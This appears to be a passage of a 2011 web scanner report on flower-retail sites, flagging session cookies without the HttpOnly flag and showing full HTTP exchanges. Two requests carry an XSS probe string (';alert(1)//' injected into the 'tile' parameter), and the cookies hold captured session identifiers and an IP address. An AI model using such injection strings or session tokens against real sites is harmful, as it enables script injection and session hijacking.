The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /deliverycalendarnew.do?month=5&year=2011&locationType=1&itemCount=1&prodType=FPT&productPrice=59.99&zip=10010&country=&productSKU=91637L&contextPageType=PRODUCT&isGeoSell=false&field=deliveryDate&baseCode=91637&nextMonthAvailableCheck=true&page=product HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Origin: http://ww30.1800flowers.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000vYqYqATbr9y3gSABi7eMNL4:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:10:33 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000nxW65vjjsfTSi330BxyCo7S:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 37743


<html>
<head>    
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/flowers_enterprise_apr1.css"/>

<script type="text
...[SNIP]...

13.10. http://ww30.1800flowers.com/guidedmodel.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800flowers.com
Path:   /guidedmodel.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /guidedmodel.do?dataset=10305&viewCounts=0 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
Origin: http://ww30.1800flowers.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; CoreAt=90074784=1|1|0|0|0|0|0|0|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902848067&t2=-1&t3=1304902867488&lti=1304902867488&ln=tab3p1_header&hr=/collection.do%3Fdataset%3D10305&fti=&fn=searchform%3A0%3Bfindgiftform%3A1%3BUNDEFINED%3A2%3B&ac=&fd=&uer=&fu=&pi=w-Welcome%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=0000uX3-gHyeEcHw9aTrUn6TXJ9:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.2.10.1304902847
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:04:54 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Set-Cookie: JSESSIONID=0000dkHruW9CzZio-yRk_Iqcrqc:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4311


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>

</head>

<body>


<SCRIPT>

$(function(){    
   
   var isSameDay
...[SNIP]...

13.11. http://ww30.1800flowers.com/product.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800flowers.com
Path:   /product.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /product.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
Origin: http://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; JSESSIONID=0000se4bMqEJJFjkiTeOn0WDYky:-1; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305
Content-Length: 770

delDateColl=&personalizable=false&submitForm=&personalComment=&personalCount=&generalProductDataset=1011&hospitalDataset=10156&funeralHomeDataset=10216&ruralRouteDataset=10156&fagfDataset=11354&datase
...[SNIP]...

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 01:11:20 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Location: http://ww30.1800flowers.com/shoppingbasket.do
Set-Cookie: JSESSIONID=0000WBtYpk6MHvW-ksHuJLcHDSO:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html
Content-Language: en-US
Content-Length: 0


13.12. http://ww30.1800flowers.com/shoppingbasket.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800flowers.com
Path:   /shoppingbasket.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.4.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|4|0|0|0|0|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902910729&t2=1304902919731&t3=1304902952007&t4=1304902907868&lti=1304902952006&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304902952021&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A25%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20Fields%20of%20Europe%20for%20Spring%20%2891637%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800flowers.com/product.do%3FbaseCode%3D91637%26dataset%3D10305%26cm_cid%3Dd10305&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:11:22 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000GsjYiBW6hk4zCZT985cxiBR:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 62042


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...

13.13. https://ww30.1800flowers.com/checkoutsignin.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://ww30.1800flowers.com
Path:   /checkoutsignin.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkoutsignin.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: http://ww30.1800flowers.com/shoppingbasket.do
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; JSESSIONID=0000Fep_6e7sSO_rh0rC-n3Lun2:-1; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:03:06 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 19826


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...

13.14. https://ww30.1800flowers.com/continueasguest.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://ww30.1800flowers.com
Path:   /continueasguest.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /continueasguest.do HTTP/1.1
Host: ww30.1800flowers.com
Connection: keep-alive
Referer: https://ww30.1800flowers.com/checkoutsignin.do
Cache-Control: max-age=0
Origin: https://ww30.1800flowers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; __utmz=1.1304902847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cmTPSet=Y; CMAVID=70091303843240316067555; __utma=1.2024771767.1304902847.1304902847.1304902847.1; __utmc=1; __utmb=1.5.10.1304902847; 87011923-VID=16601209214853; 87011923-SKEY=2552283548708337271; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|5|0|0|0|1|0|1|0|0|0|0|1|1304902859|1_|1561_&; cmRS=&t1=1304902956353&t2=1304902961198&t3=1304902975503&t4=1304902955083&lti=1304902969048&ln=&hr=javascript%3AsetEvent%28shipping%2CshoppingBasketForm%29&fti=1304902969061&fn=searchform%3A0%3BshoppingBasketForm%3A1%3BUNDEFINED%3A2%3B&ac=1:S&fd=&uer=&fu=/shoppingbasket.do&pi=o-Checkout%20-%20Shopping%20Basket%20Page&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=00005vXThlkYEPvWrxltBHolJWL:-1
Content-Length: 9

x=74&y=15

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:15:20 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000XbGXHrF9nwuNJodRv3iY_Xi:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 1142175


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Expires" content="1">
...[SNIP]...

13.15. http://www.cherrymoonfarms.com/default.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cherrymoonfarms.com
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.cherrymoonfarms.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=p4m5s4gmscsdxjspfxzi5djy; domain=cherrymoonfarms.com; path=/
Set-Cookie: ASP.NET_SessionId=p4m5s4gmscsdxjspfxzi5djy; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_CMF=TestAssignmentValues=nta-2,xca-1,nte-1,cpz-1,csc-4,ntb-1,ntc-1,xcb-1,xcc-1,cfq-1,ntd-2; domain=.cherrymoonfarms.com; expires=Sat, 09-Jun-2012 12:22:05 GMT; path=/
Set-Cookie: ENDOFDAY_CMF=TestAssignmentValues=,chh-1,cks-1,mpsmediapersonalitysplit-1,ckt-2; domain=.cherrymoonfarms.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_CMF=TestConfigDateTimeUpdated=5/9/2011 5:22:05 AM; domain=.cherrymoonfarms.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=57; domain=.cherrymoonfarms.com; expires=Thu, 12-May-2011 12:22:05 GMT; path=/
Set-Cookie: CMF_BrowserId=648da04f-a5ff-42b4-9370-fae55b915cad; domain=.cherrymoonfarms.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: CMF_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.cherrymoonfarms.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:04 GMT
Content-Length: 107521


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...

13.16. http://www.personalcreations.com/default.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.personalcreations.com
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.personalcreations.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=wz0kwfor3fvne2lfjnllwoah; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=wz0kwfor3fvne2lfjnllwoah; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-1,ttb-3,nte-3,ntc-2,tpr-1,ntb-1,xta-1,tpp-4,tbc-2,ntd-1,xtc-1,tmm-1,xtb-1,trr-2,tvo-1,tpf-1; domain=.personalcreations.com; expires=Sat, 09-Jun-2012 12:23:17 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txb-1,tkt-2,thp-2,txa-2,tks-1,txc-1,mpsmediapersonalitysplit-2; domain=.personalcreations.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=5/9/2011 5:23:17 AM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=5; domain=.personalcreations.com; expires=Thu, 12-May-2011 12:23:17 GMT; path=/
Set-Cookie: PCR_BrowserId=7e39bf7a-035a-482a-a5ba-f1400b3f220a; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:23:19 GMT
Content-Length: 120465


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...

13.17. http://www.proflowers.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.proflowers.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=vdbbjo2ye2hg5x4cildhrv3t; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=vdbbjo2ye2hg5x4cildhrv3t; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-2,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-7,nte-3,phl-2,ppv-3,phr-1,nta-1,xpc-1,ntb-1,pnp-1,ppr-1,pmm-2,pem-1,pfe-3,pml-0; domain=.proflowers.com; expires=Sat, 09-Jun-2012 12:07:41 GMT; path=/
Set-Cookie: ENDOFDAY_PFC=TestAssignmentValues=,pxc-3,mpsmediapersonalitysplit-1,zzd-1,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; domain=.proflowers.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:41 AM; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=50; domain=.proflowers.com; expires=Thu, 12-May-2011 12:07:41 GMT; path=/
Set-Cookie: PFC_BrowserId=92c68dc8-4b77-41de-89a7-78ac8cdfbbd3; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:07:40 GMT
Content-Length: 88497


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...

13.18. http://www.proflowers.com/house-plants-PBS

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.proflowers.com
Path:   /house-plants-PBS

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fhouse-plants-PBS%25253Ftile%25253Dhmpg_podA%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:43 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:10:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:10:43 GMT
Content-Length: 184823


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...

